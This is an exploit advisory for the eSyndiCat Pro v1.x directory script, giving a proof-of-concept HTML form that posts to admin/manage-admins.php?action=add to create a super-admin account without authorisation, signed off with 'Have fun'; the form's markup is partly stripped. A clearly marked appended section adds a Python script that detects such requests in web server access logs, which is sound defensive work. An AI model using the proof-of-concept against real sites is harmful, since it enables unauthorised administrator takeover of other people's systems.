
eSyndiCat Input Validation Error Vulnerability






eSyndiCat is a directory web system, a product of eSyndiCat.com.
It has a security hole that allows attackers to gain admin access and more.
Affected version: eSyndiCat Pro v1.x
Affected file: manage-admins.php
Use the PoC file to attack:

------------------------------------------------

Discovered by H2P - A member of http://vnbrain.net

action="http://target/path/admin/manage-admins.php?action=add" method="post">
Admin username:
Admin Fullname:
Admin Email: value="hack2prison@freeprotect.net" />
Admin password:
Admin Password Confirmation:
Admin Status:
Submission Notification:
Payment Notification:
Admin Permissions
Super Admin:
------------------------------------------------

Have fun
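
Defenders can look for use of this form in web server access logs. The following is an added example, not part of the original advisory: it flags POSTs to manage-admins.php?action=add whose Referer is absent or off-site, which is what a form submitted from a standalone PoC file produces. The Apache "combined" log format, the host name directory.example and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" access-log format (assumed; adapt to your server).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def suspicious_admin_adds(lines, site_host):
    """Return records for POSTs to manage-admins.php?action=add whose
    Referer is missing or names a host other than site_host."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not unquote(url.path).lower().endswith("/manage-admins.php"):
            continue
        if "add" not in parse_qs(url.query).get("action", []):
            continue
        # A Referer of "-" or "" has no hostname, so it never matches site_host.
        ref_host = urlsplit(m["referer"]).hostname
        if ref_host != site_host.lower():
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "status": int(m["status"]), "referer": m["referer"]})
    return hits

# Constructed sample lines (documentation IP ranges, made-up paths and times).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2009:13:55:36 +0000] "POST /dir/admin/manage-admins.php?action=add HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2009:14:01:02 +0000] "POST /dir/admin/manage-admins.php?action=add HTTP/1.1" 200 498 "http://directory.example/dir/admin/manage-admins.php" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2009:14:02:10 +0000] "GET /dir/admin/manage-admins.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [01/Jan/2009:14:05:44 +0000] "POST /dir/admin/manage-admins.php?action=add HTTP/1.1" 302 0 "http://elsewhere.example/poc.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_adds(SAMPLE_LOG, "directory.example"):
        print(hit)
```

The Referer header is client-controlled, so treat hits as a triage signal and correlate them with newly created admin accounts.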
